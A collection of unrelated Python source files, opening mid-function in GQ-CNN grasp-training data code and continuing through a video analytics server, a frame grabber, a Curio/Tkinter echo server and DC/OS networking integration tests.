train_label_arr = train_labels_tensor.arr[ind]
num_images = train_images_arr.shape[0]
# resize images
rescale_factor = float(self.im_height) / train_images_arr.shape[1]
if rescale_factor != 1.0:
resized_train_images_arr = np.zeros([num_images,
self.im_height,
self.im_width,
self.im_channels]).astype(np.float32)
for i in range(num_images):
for c in range(train_images_arr.shape[3]):
resized_train_images_arr[i,:,:,c] = sm.imresize(train_images_arr[i,:,:,c],
rescale_factor,
interp='bicubic', mode='F')
train_images_arr = resized_train_images_arr
# add noises to images
train_images_arr, train_poses_arr = self._distort(train_images_arr, train_poses_arr)
# slice poses
train_poses_arr = read_pose_data(train_poses_arr,
self.gripper_mode)
# standardize inputs and outputs
if self._norm_inputs:
train_images_arr = (train_images_arr - self.im_mean) / self.im_std
if self.gqcnn.input_depth_mode == InputDepthMode.POSE_STREAM:
train_poses_arr = (train_poses_arr - self.pose_mean) / self.pose_std
train_label_arr = 1 * (train_label_arr > self.metric_thresh)
train_label_arr = train_label_arr.astype(self.numpy_dtype)
if self._angular_bins > 0:
bins = np.zeros_like(train_label_arr)
# form prediction mask to use when calculating loss
neg_ind = np.where(angles < 0)
angles = np.abs(angles) % self._max_angle
angles[neg_ind] *= -1
g_90 = np.where(angles > (self._max_angle / 2))
l_neg_90 = np.where(angles < (-1 * (self._max_angle / 2)))
angles[g_90] -= self._max_angle
angles[l_neg_90] += self._max_angle
angles *= -1 # hack to fix reverse angle convention
angles += (self._max_angle / 2)
train_pred_mask_arr = np.zeros((train_label_arr.shape[0], self._angular_bins*2))
for i in range(angles.shape[0]):
bins[i] = angles[i] // self._bin_width
train_pred_mask_arr[i, int((angles[i] // self._bin_width)*2)] = 1
train_pred_mask_arr[i, int((angles[i] // self._bin_width)*2 + 1)] = 1
# compute the number of examples loaded
num_loaded = train_images_arr.shape[0]
end_i = start_i + num_loaded
# enqueue training data batch
train_images[start_i:end_i, ...] = train_images_arr.copy()
train_poses[start_i:end_i,:] = train_poses_arr.copy()
train_labels[start_i:end_i] = train_label_arr.copy()
if self._angular_bins > 0:
train_pred_mask[start_i:end_i] = train_pred_mask_arr.copy()
del train_images_arr
del train_poses_arr
del train_label_arr
# update start index
start_i = end_i
num_queued += num_loaded
# send data to queue
if not self.term_event.is_set():
try:
if self._angular_bins > 0:
self.prefetch_q.put_nowait((train_images, train_poses, train_labels, train_pred_mask))
else:
self.prefetch_q.put_nowait((train_images, train_poses, train_labels))
except queue.Full:
time.sleep(GeneralConstants.QUEUE_SLEEP)
queue_stop = time.time()
self.logger.debug('Queue batch took %.3f sec' %(queue_stop - queue_start))
del train_images
del train_poses
del train_labels
if self._angular_bins > 0:
del train_pred_mask
def _distort(self, image_arr, pose_arr):
""" Adds noise to a batch of images """
# read params
num_images = image_arr.shape[0]
# denoising and synthetic data generation
if self.cfg['multiplicative_denoising']:
mult_samples = ss.gamma.rvs(self.gamma_shape, scale=self.gamma_scale, size=num_images)
mult_samples = mult_samples[:,np.newaxis,np.newaxis,np.newaxis]
image_arr = image_arr * np.tile(mult_samples, [1, self.im_height, self.im_width, self.im_channels])
# add correlated Gaussian noise
if self.cfg['gaussian_process_denoising']:
for i in range(num_images):
if np.random.rand() < self.cfg['gaussian_process_rate']:
train_image = image_arr[i,:,:,0]
gp_noise = ss.norm.rvs(scale=self.gp_sigma, size=self.gp_num_pix).reshape(self.gp_sample_height, self.gp_sample_width)
gp_noise = sm.imresize(gp_noise, self.gp_rescale_factor, interp='bicubic', mode='F')
train_image[train_image > 0] += gp_noise[train_image > 0]
image_arr[i,:,:,0] = train_image
# symmetrize images
if self.cfg['symmetrize']:
for i in range(num_images):
train_image = image_arr[i,:,:,0]
# rotate with 50% probability
if np.random.rand() < 0.5:
theta = 180.0
rot_map = cv2.getRotationMatrix2D(tuple(self.im_center), theta, 1)
train_image = cv2.warpAffine(train_image, rot_map, (self.im_height, self.im_width), flags=cv2.INTER_NEAREST)
if self.gripper_mode == GripperMode.LEGACY_SUCTION:
pose_arr[:,3] = -pose_arr[:,3]
elif self.gripper_mode == GripperMode.SUCTION:
pose_arr[:,4] = -pose_arr[:,4]
# reflect left right with 50% probability
if np.random.rand() < 0.5:
train_image = np.fliplr(train_image)
# reflect up down with 50% probability
if np.random.rand() < 0.5:
train_image = np.flipud(train_image)
if self.gripper_mode == GripperMode.LEGACY_SUCTION:
pose_arr[:,3] = -pose_arr[:,3]
elif self.gripper_mode == GripperMode.SUCTION:
pose_arr[:,4] = -pose_arr[:,4]
image_arr[i,:,:,0] = train_image
return image_arr, pose_arr
def _error_rate_in_batches(self, num_files_eval=None, validation_set=True):
""" Compute error and loss over either training or validation set
Returns
-------
:obj:'autolab_core.BinaryClassificationResult`
validation error
"""
all_predictions = []
all_labels = []
# subsample files
file_indices = np.arange(self.num_tensors)
if num_files_eval is None:
num_files_eval = self.max_files_eval
np.random.shuffle(file_indices)
if self.max_files_eval is not None and num_files_eval > 0:
file_indices = file_indices[:num_files_eval]
for i in file_indices:
# load next file
images = self.dataset.tensor(self.im_field_name, i).arr
poses = self.dataset.tensor(self.pose_field_name, i).arr
raw_poses = np.array(poses, copy=True)
labels = self.dataset.tensor(self.label_field_name, i).arr
# if no datapoints from this file are in validation then just continue
if validation_set:
indices = self.val_index_map[i]
else:
indices = self.train_index_map[i]
if len(indices) == 0:
continue
images = images[indices,...]
poses = read_pose_data(poses[indices,:],
self.gripper_mode)
raw_poses = raw_poses[indices, :]
labels = labels[indices]
if self.training_mode == TrainingMode.CLASSIFICATION:
labels = 1 * (labels > self.metric_thresh)
labels = labels.astype(np.uint8)
if self._angular_bins > 0:
# form mask to extract predictions from ground-truth angular bins
angles = raw_poses[:, 3]
neg_ind = np.where(angles < 0)
angles = np.abs(angles) % self._max_angle
angles[neg_ind] *= -1
g_90 = np.where(angles > (self._max_angle / 2))
l_neg_90 = np.where(angles < (-1 * (self._max_angle / 2)))
angles[g_90] -= self._max_angle
angles[l_neg_90] += self._max_angle
angles *= -1 # hack to fix reverse angle convention
angles += (self._max_angle / 2)
pred_mask = np.zeros((labels.shape[0], self._angular_bins*2), dtype=bool)
for i in range(angles.shape[0]):
pred_mask[i, int((angles[i] // self._bin_width)*2)] = True
pred_mask[i, int((angles[i] // self._bin_width)*2 + 1)] = True
# get predictions
predictions = self.gqcnn.predict(images, poses)
if self._angular_bins > 0:
predictions = predictions[pred_mask].reshape((-1, 2))
# update
all_predictions.extend(predictions[:,1].tolist())
all_labels.extend(labels.tolist())
# clean up
del images
del poses
# get learning result
result = None
if self.training_mode == TrainingMode.CLASSIFICATION:
result = BinaryClassificationResult(all_predictions, all_labels)
else:
result = RegressionResult(all_predictions, all_labels)
return result
|
__main__.py
|
#!/usr/bin/env python3
import sys
import os
import connexion
import asyncio
from openapi_server import encoder
sys.path.append(os.path.dirname(__file__) + "/../../")
from common.settings import CONFIG_PATH
from common.settings import MAX_RUNNING_PIPELINES
from modules.PipelineManager import PipelineManager
from modules.ModelManager import ModelManager
from threading import Thread
from common.utils import logging
from optparse import OptionParser
logger = logging.get_logger('main', is_static=True)
def get_options():
parser = OptionParser()
parser.add_option("-p", "--port", action="store", type="int", dest="port", default=8080)
parser.add_option("--framework", action="store", dest="framework",
choices=['gstreamer', 'ffmpeg'], default='gstreamer')
parser.add_option("--pipeline_dir", action="store", dest="pipeline_dir",
type="string", default='pipelines/gstreamer')
parser.add_option("--model_dir", action="store", dest="model_dir",
type="string", default='models')
return parser.parse_args()
def gobject_mainloop():
from gi.repository import Gst, GObject
mainloop = GObject.MainLoop()
try:
mainloop.run()
except KeyboardInterrupt:
pass
def main(options):
PipelineManager.load_config(os.path.join(CONFIG_PATH, options.pipeline_dir), MAX_RUNNING_PIPELINES)
ModelManager.load_config(os.path.join(CONFIG_PATH, options.model_dir))
asyncio.set_event_loop(asyncio.new_event_loop())
app = connexion.App(__name__, specification_dir='./openapi/')
app.app.json_encoder = encoder.JSONEncoder
app.add_api('openapi.yaml', arguments={'title': 'Video Analytics API'})
logger.info("Starting Tornado Server on port: {p}".format(p=options.port))
app.run(server='tornado', port=options.port)
if __name__ == '__main__':
try:
options, args = get_options()
except Exception as error:
print(error)
logger.error("Getopt Error!")
exit(1)
thread = Thread(target=main, args=[options])
thread.daemon = True
thread.start()
if (options.framework == "gstreamer"):
gobject_mainloop()
else:
thread.join()
logger.info("Exiting")
|
ThreadedImageGrabber.py
|
import threading
import cv2
import numpy as np
class ThreadedImageGrabber:
stopped: bool = False
__thread: threading.Thread
__frame: np.ndarray
def __init__(self, src):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.__frame) = self.stream.read()
def start(self) -> 'ThreadedImageGrabber':
self.__thread = threading.Thread(target=self.grab, args=())
self.__thread.start()
return self
def grab(self) -> None:
while not self.stopped:
if not self.grabbed:
self.stop()
else:
(self.grabbed, frame) = self.stream.read()
self.__frame = frame
def stop(self) -> None:
self.stopped = True
self.__thread.join()
def read(self) -> np.ndarray:
return self.__frame
|
deskunity.py
|
""""
DeskUnity 1.0
Starter Class
"""
import logging
import threading
from gui import GUI
from core.interface import Interface
from core.computer import Computer
logging.basicConfig(
level=logging.DEBUG,
format='[%(levelname)s] %(message)s'
)
class DeskUnity:
this_computer = None
app = None
thread = None
def __init__(self):
self.app = GUI(exit_handler=self.exit_handler)
def show_ui(self):
self.app.show()
def start(self):
logging.info("Starting DeskUnity...")
# app = GUI()
def run():
self.app.ui.set_status("Searching for servers...")
servers = Interface.get_desk_unity_servers()
self.this_computer = Computer()
if len(servers) == 0:
self.app.ui.set_status("No server founds.")
logging.info("No server found.")
self.app.ui.set_status("Starting as server.")
self.this_computer.start_server()
self.app.ui.set_status("Server Started.")
return True
else:
lan_server = servers[0]
if len(servers) > 1:
self.app.ui.set_status("Found more than one server, choosing best interface...")
for server in servers:
interface = Interface.get_interface_by_ip(server)
if interface["lan"]:
lan_server = server
self.app.ui.set_status("Connecting to server...")
self.this_computer.connect_to_server(lan_server)
else:
server = servers[0]
self.app.ui.set_status("Connecting to server...")
self.this_computer.connect_to_server(server)
self.app.ui.set_status("Connected to server.")
return False
self.thread = threading.Thread(target=run)
self.thread.start()
def exit_handler(self):
if self.this_computer.is_server():
self.this_computer.stop_server()
else:
self.this_computer.stop_client()
|
guiserv2.py
|
# guiserv2.py
#
# Another example of integrating Curio with the Tkinter
# event loop using UniversalQueue and threads.
import tkinter as tk
import threading
from curio import *
class EchoApp(object):
def __init__(self):
self.gui_ops = UniversalQueue(withfd=True)
self.coro_ops = UniversalQueue()
# Main Tk window
self.root = tk.Tk()
# Number of clients connected label
self.clients_label = tk.Label(text='')
self.clients_label.pack()
self.nclients = 0
self.incr_clients(0)
self.client_tasks = set()
# Number of bytes received label
self.bytes_received = 0
self.bytes_label = tk.Label(text='')
self.bytes_label.pack()
self.update_bytes()
# Disconnect all button
self.disconnect_button = tk.Button(text='Disconnect all',
command=lambda: self.coro_ops.put(self.disconnect_all()))
self.disconnect_button.pack()
# Set up event handler for queued GUI updates
self.root.createfilehandler(self.gui_ops, tk.READABLE, self.process_gui_ops)
def incr_clients(self, delta=1):
self.nclients += delta
self.clients_label.configure(text='Number Clients %d' % self.nclients)
def update_bytes(self):
self.bytes_label.configure(text='Bytes received %d' % self.bytes_received)
self.root.after(1000, self.update_bytes)
def process_gui_ops(self, file, mask):
while not self.gui_ops.empty():
func, args = self.gui_ops.get()
func(*args)
async def echo_client(self, sock, address):
await self.gui_ops.put((self.incr_clients, (1,)))
self.client_tasks.add(await current_task())
try:
async with sock:
while True:
data = await sock.recv(100000)
if not data:
break
self.bytes_received += len(data)
await sock.sendall(data)
finally:
self.client_tasks.remove(await current_task())
await self.gui_ops.put((self.incr_clients, (-1,)))
async def disconnect_all(self):
for task in list(self.client_tasks):
await task.cancel()
async def main(self):
serv = await spawn(tcp_server, '', 25000, self.echo_client)
while True:
coro = await self.coro_ops.get()
await coro
def run_forever(self):
threading.Thread(target=run, args=(self.main,)).start()
self.root.mainloop()
if __name__ == '__main__':
app = EchoApp()
app.run_forever()
|
test_networking.py
|
import contextlib
import enum
import itertools
import json
import logging
import subprocess
import threading
import time
import uuid
from collections import deque
import pytest
import requests
import retrying
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.helpers import assert_response_ok
__maintainer__ = 'urbanserj'
__contact__ = 'dcos-networking@mesosphere.io'
log = logging.getLogger(__name__)
GLOBAL_PORT_POOL = iter(range(10000, 32000))
GLOBAL_OCTET_POOL = itertools.cycle(range(254, 10, -1))
class Container(enum.Enum):
POD = 'POD'
class MarathonApp:
def __init__(self, container, network, host,
vip=None, network_name=None,
app_name_fmt=None, host_port=None):
if host_port is None:
host_port = unused_port()
args = {
'app_name_fmt': app_name_fmt,
'network': network,
'host_port': host_port,
'host_constraint': host,
'vip': vip,
'container_type': container,
'healthcheck_protocol': marathon.Healthcheck.MESOS_HTTP
}
if network == marathon.Network.USER:
args['container_port'] = unused_port()
if network_name is not None:
args['network_name'] = network_name
if vip is not None:
del args['host_port']
self.app, self.uuid = test_helpers.marathon_test_app(**args)
# allow this app to run on public slaves
self.app['acceptedResourceRoles'] = ['*', 'slave_public']
self.id = self.app['id']
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/apps', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/apps/{}'.format(self.id))
assert_response_ok(r)
self._info = r.json()
assert self._info['app']['tasksHealthy'] == self.app['instances']
def info(self, dcos_api_session):
try:
if self._info['app']['tasksHealthy'] != self.app['instances']:
raise Exception("Number of Healthy Tasks not equal to number of instances.")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
task = info['app']['tasks'][0]
if 'networks' in self.app and \
self.app['networks'][0]['mode'] == 'container' and \
self.app['networks'][0]['name'] == 'dcos':
host = task['ipAddresses'][0]['ipAddress']
port = self.app['container']['portMappings'][0]['containerPort']
else:
host = task['host']
port = task['ports'][0]
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/apps/{}'.format(self.id))
class MarathonPod:
def __init__(self, network, host, vip=None, pod_name_fmt='/integration-test-{}'):
self._network = network
container_port = 0
if network is not marathon.Network.HOST:
container_port = unused_port()
# ENDPOINT_TEST will be computed from the `endpoints` definition. See [1], [2]
# [1] https://dcos.io/docs/1.10/deploying-services/pods/technical-overview/#environment-variables
# [2] https://github.com/mesosphere/marathon/blob/v1.5.0/
# src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala#L420-L443
port = '$ENDPOINT_TEST' if network == marathon.Network.HOST else container_port
self.uuid = uuid.uuid4().hex
self.id = pod_name_fmt.format(self.uuid)
self.app = {
'id': self.id,
'scheduling': {'placement': {'acceptedResourceRoles': ['*', 'slave_public']}},
'containers': [{
'name': 'app-{}'.format(self.uuid),
'resources': {'cpus': 0.01, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:stretch-slim'},
'exec': {'command': {
'shell': '/opt/mesosphere/bin/dcos-shell python '
'/opt/mesosphere/active/dcos-integration-test/util/python_test_server.py '
'{}'.format(port)
}},
'volumeMounts': [{'name': 'opt', 'mountPath': '/opt/mesosphere'}],
'endpoints': [{'name': 'test', 'protocol': ['tcp'], 'hostPort': unused_port()}],
'environment': {'DCOS_TEST_UUID': self.uuid, 'HOME': '/'}
}],
'networks': [{'mode': 'host'}],
'volumes': [{'name': 'opt', 'host': '/opt/mesosphere'}]
}
if host is not None:
self.app['scheduling']['placement']['constraints'] = \
[{'fieldName': 'hostname', 'operator': 'CLUSTER', 'value': host}]
if vip is not None:
self.app['containers'][0]['endpoints'][0]['labels'] = \
{'VIP_0': vip}
if network == marathon.Network.USER:
del self.app['containers'][0]['endpoints'][0]['hostPort']
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'name': 'dcos', 'mode': 'container'}]
elif network == marathon.Network.BRIDGE:
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'mode': 'container/bridge'}]
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/pods', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000,
retry_on_result=lambda res: res is False)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/pods/{}::status'.format(self.id))
assert_response_ok(r)
self._info = r.json()
error_msg = 'Status was {}: {}'.format(self._info['status'], self._info.get('message', 'no message'))
assert self._info['status'] == 'STABLE', error_msg
def info(self, dcos_api_session):
try:
if self._info['status'] != 'STABLE':
raise Exception("The status information is not Stable!")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
if self._network == marathon.Network.USER:
host = info['instances'][0]['networks'][0]['addresses'][0]
port = self.app['containers'][0]['endpoints'][0]['containerPort']
else:
host = info['instances'][0]['agentHostname']
port = info['instances'][0]['containers'][0]['endpoints'][0]['allocatedHostPort']
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/pods/{}'.format(self.id))
def unused_port():
global GLOBAL_PORT_POOL
return next(GLOBAL_PORT_POOL)
def unused_octet():
global GLOBAL_OCTET_POOL
return next(GLOBAL_OCTET_POOL)
def lb_enabled():
expanded_config = test_helpers.get_expanded_config()
return expanded_config['enable_lb'] == 'true'
@retrying.retry(wait_fixed=2000,
stop_max_delay=5 * 60 * 1000,
retry_on_result=lambda ret: ret is None)
def ensure_routable(cmd, host, port, json_output=True):
proxy_uri = 'http://{}:{}/run_cmd'.format(host, port)
log.info('Sending {} data: {}'.format(proxy_uri, cmd))
response = requests.post(proxy_uri, data=cmd, timeout=5).json()
log.info('Requests Response: {}'.format(repr(response)))
if response['status'] != 0:
return None
return json.loads(response['output']) if json_output else response['output']
def generate_vip_app_permutations():
""" Generate all possible network interface permutations for applying vips
"""
containers = list(marathon.Container) + [Container.POD]
return [(container, vip_net, proxy_net)
for container in containers
for vip_net in list(marathon.Network)
for proxy_net in list(marathon.Network)]
def workload_test(dcos_api_session, container, app_net, proxy_net, ipv6, same_host):
(vip, hosts, cmd, origin_app, proxy_app, _pm_app) = \
vip_workload_test(dcos_api_session, container,
app_net, proxy_net, ipv6, True, same_host, False)
return (hosts, origin_app, proxy_app)
@pytest.mark.first
def test_docker_image_availablity():
assert test_helpers.docker_pull_image("debian:stretch-slim"), "docker pull failed for image used in the test"
@pytest.mark.slow
@pytest.mark.parametrize('same_host', [True, False])
def test_ipv6(dcos_api_session, same_host):
''' Testing autoip, containerip and *.mesos FQDN on ipv6 overlay network '''
(hosts, origin_app, proxy_app) = \
workload_test(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, True, same_host)
log.info('Starting apps :: Hosts: {}'.format(hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
origin_app.wait(dcos_api_session)
proxy_app.wait(dcos_api_session)
log.info('Apps are ready')
origin_app_info = origin_app.info(dcos_api_session)
origin_port = origin_app_info['app']['container']['portMappings'][0]['containerPort']
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
dns_name = '-'.join(reversed(origin_app.id.split('/')[1:]))
try:
zones = ["marathon.autoip.dcos.thisdcos.directory",
"marathon.containerip.dcos.thisdcos.directory",
"marathon.mesos"]
for zone in zones:
cmd = '{} --ipv6 http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'{}.{}:{}'.format(dns_name, zone, origin_port))
log.info("Remote command: {}".format(cmd))
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
@pytest.mark.slow
def test_vip_ipv6(dcos_api_session):
return test_vip(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, ipv6=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container',
list(marathon.Container))
def test_vip_port_mapping(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network=marathon.Network.HOST,
proxy_net: marathon.Network=marathon.Network.HOST):
return test_vip(dcos_api_session, container, vip_net, proxy_net, with_port_mapping_app=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container,vip_net,proxy_net',
generate_vip_app_permutations())
def test_vip(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network,
proxy_net: marathon.Network,
ipv6: bool=False,
with_port_mapping_app=False):
'''Test VIPs between the following source and destination configurations:
* containers: DOCKER, UCR and NONE
* networks: USER, BRIDGE, HOST
* agents: source and destnations on same agent or different agents
* vips: named and unnamed vip
Origin app will be deployed to the cluster with a VIP. Proxy app will be
deployed either to the same host or elsewhere. Finally, a thread will be
started on localhost (which should be a master) to submit a command to the
proxy container that will ping the origin container VIP and then assert
that the expected origin app UUID was returned
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
errors = []
tests = setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Testing :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info("Remote command: {}".format(cmd))
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
try:
if ipv6 and len(hosts) < 2:
# NOTE: If proxy and origin apps run on the same host, IPv6 VIP works from
# proxy task's network namespace only when bridge-nf-call-ip6tables is enabled, i.e
# sysctl -w net.bridge.bridge-nf-call-ip6tables=1
# JIRA: https://jira.mesosphere.com/browse/DCOS_OSS-5122
continue
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
except Exception as e:
log.error('Exception: {}'.format(e))
errors.append(e)
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
if pm_app is not None:
log.info('Purging application: {}'.format(pm_app.id))
pm_app.purge(dcos_api_session)
assert not errors
def setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app=False):
same_hosts = [True, False] if len(dcos_api_session.all_slaves) > 1 else [True]
tests = [vip_workload_test(dcos_api_session, container, vip_net, proxy_net,
ipv6, named_vip, same_host, with_port_mapping_app)
for named_vip in [True, False]
for same_host in same_hosts]
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
# We do not need the service endpoints because we have deterministically assigned them
log.info('Starting apps :: VIP: {}, Hosts: {}'.format(vip, hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
if pm_app is not None:
log.info("Port Mapping app: {}".format(pm_app))
pm_app.deploy(dcos_api_session)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Deploying apps :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info('Deploying origin app: {}'.format(origin_app.id))
origin_app.wait(dcos_api_session)
log.info('Deploying proxy app: {}'.format(proxy_app.id))
proxy_app.wait(dcos_api_session)
if pm_app is not None:
log.info("Deploying port mapping app: {}".format(pm_app))
pm_app.wait(dcos_api_session)
log.info('Apps are ready')
return tests
def vip_workload_test(dcos_api_session, container, vip_net, proxy_net, ipv6,
named_vip, same_host, with_port_mapping_app):
slaves = dcos_api_session.slaves + dcos_api_session.public_slaves
vip_port = unused_port()
origin_host = slaves[0]
proxy_host = slaves[0] if same_host else slaves[1]
if named_vip:
label = str(uuid.uuid4())
vip = '/{}:{}'.format(label, vip_port)
vipaddr = '{}.marathon.l4lb.thisdcos.directory:{}'.format(label, vip_port)
elif ipv6:
vip_ip = 'fd01:c::{}'.format(unused_octet())
vip = '{}:{}'.format(vip_ip, vip_port)
vipaddr = '[{}]:{}'.format(vip_ip, vip_port)
else:
vip = '198.51.100.{}:{}'.format(unused_octet(), vip_port)
vipaddr = vip
cmd = '{} {} http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'--ipv6' if ipv6 else '--ipv4',
vipaddr)
path_id = '/integration-tests/{}-{}-{}'.format(
enum2str(container),
net2str(vip_net, ipv6),
net2str(proxy_net, ipv6))
test_case_id = '{}-{}'.format(
'named' if named_vip else 'vip',
'local' if same_host else 'remote')
# NOTE: DNS label can't be longer than 63 bytes
origin_fmt = '{}/app-{}'.format(path_id, test_case_id)
origin_fmt = origin_fmt + '-{{:.{}}}'.format(63 - len(origin_fmt))
proxy_fmt = '{}/proxy-{}'.format(path_id, test_case_id)
proxy_fmt = proxy_fmt + '-{{:.{}}}'.format(63 - len(proxy_fmt))
network_name = 'dcos6' if ipv6 else 'dcos' # it is used for user network mode only
if container == Container.POD:
origin_app = MarathonPod(vip_net, origin_host, vip, pod_name_fmt=origin_fmt)
proxy_app = MarathonPod(proxy_net, proxy_host, pod_name_fmt=proxy_fmt)
else:
origin_app = MarathonApp(container, vip_net, origin_host, vip,
network_name=network_name, app_name_fmt=origin_fmt)
proxy_app = MarathonApp(container, proxy_net, proxy_host,
network_name=network_name, app_name_fmt=proxy_fmt)
# Port mappiong application runs on `proxy_host` and has the `host_port` same as `vip_port`.
pm_fmt = '{}/pm-{}'.format(path_id, test_case_id)
pm_fmt = pm_fmt + '-{{:.{}}}'.format(63 - len(pm_fmt))
if with_port_mapping_app:
pm_container = Container.MESOS if container == Container.POD else container
pm_app = MarathonApp(pm_container, marathon.Network.BRIDGE, proxy_host, host_port=vip_port, app_name_fmt=pm_fmt)
else:
pm_app = None
hosts = list(set([origin_host, proxy_host]))
return (vip, hosts, cmd, origin_app, proxy_app, pm_app)
@pytest.mark.xfailflake(
jira='DCOS-53552',
reason='flaky because of outdated docker version in the universal installer',
since='2019-07-11'
)
@retrying.retry(wait_fixed=2000,
stop_max_delay=120 * 1000,
retry_on_exception=lambda x: True)
def test_if_overlay_ok(dcos_api_session):
def _check_overlay(hostname, port):
overlays = dcos_api_session.get('/overlay-agent/overlay', host=hostname, port=port).json()['overlays']
assert len(overlays) > 0
for overlay in overlays:
assert overlay['state']['status'] == 'STATUS_OK'
for master in dcos_api_session.masters:
_check_overlay(master, 5050)
for slave in dcos_api_session.all_slaves:
_check_overlay(slave, 5051)
def test_if_dcos_l4lb_disabled(dcos_api_session):
'''Test to make sure dcos_l4lb is disabled'''
if lb_enabled():
pytest.skip('Load Balancer enabled')
data = subprocess.check_output(['/usr/bin/env', 'ip', 'rule'])
# dcos-net creates this ip rule: `9999: from 9.0.0.0/8 lookup 42`
# We check it doesn't exist
assert str(data).find('9999') == -1
def test_ip_per_container(dcos_api_session):
'''Test if we are able to connect to a task with ip-per-container mode
'''
# Launch the test_server in ip-per-container mode (user network)
if len(dcos_api_session.slaves) < 2:
pytest.skip("IP Per Container tests require 2 private agents to work")
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=marathon.Network.USER,
host_port=9080)
app_definition['instances'] = 2
app_definition['constraints'] = [['hostname', 'UNIQUE']]
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=True):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
app_port = app_definition['container']['portMappings'][0]['containerPort']
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}:{}/ping'.format(service_points[1].ip, app_port)
ensure_routable(cmd, service_points[0].host, service_points[0].port)
@pytest.mark.parametrize('networking_mode', list(marathon.Network))
@pytest.mark.parametrize('host_port', [9999, 0])
def test_app_networking_mode_with_defined_container_port(dcos_api_session, networking_mode, host_port):
"""
The Admin Router can proxy a request on the `/service/[app]`
endpoint to an application running in a container in different networking
modes with manually or automatically assigned host port on which is
the application HTTP endpoint exposed.
Networking modes are testing following configurations:
- host
- container
- container/bridge
https://mesosphere.github.io/marathon/docs/networking.html#networking-modes
"""
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=networking_mode,
host_port=host_port)
dcos_service_name = uuid.uuid4().hex
app_definition['labels'] = {
'DCOS_SERVICE_NAME': dcos_service_name,
'DCOS_SERVICE_PORT_INDEX': '0',
'DCOS_SERVICE_SCHEME': 'http',
}
# Arbitrary buffer time, accounting for propagation/processing delay.
buffer_time = 5
# Cache refresh in Adminrouter takes 30 seconds at most.
# CACHE_POLL_PERIOD=25s + valid=5s Nginx resolver DNS entry TTL
# https://github.com/dcos/dcos/blob/cb9105ee537cc44cbe63cc7c53b3b01b764703a0/
# packages/adminrouter/extra/src/includes/http/master.conf#L21
adminrouter_default_refresh = 25 + 5 + buffer_time
app_id = app_definition['id']
app_instances = app_definition['instances']
app_definition['constraints'] = [['hostname', 'UNIQUE']]
# For the routing check to work, two conditions must be true:
#
# 1. The application must be deployed, so that `/ping` responds with 200.
# 2. The Admin Router routing layer must not be using an outdated
# version of the Nginx resolver cache.
#
# We therefore wait until these conditions have certainly been met.
# We wait for the Admin Router cache refresh first so that there is
# unlikely to be much double-waiting. That is, we do not want to be waiting
# for the cache to refresh when it already refreshed while we were waiting
# for the app to become healthy.
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=False):
time.sleep(adminrouter_default_refresh)
dcos_api_session.marathon.wait_for_app_deployment(
app_id=app_id,
app_instances=app_instances,
check_health=False,
ignore_failed_tasks=False,
timeout=1200,
)
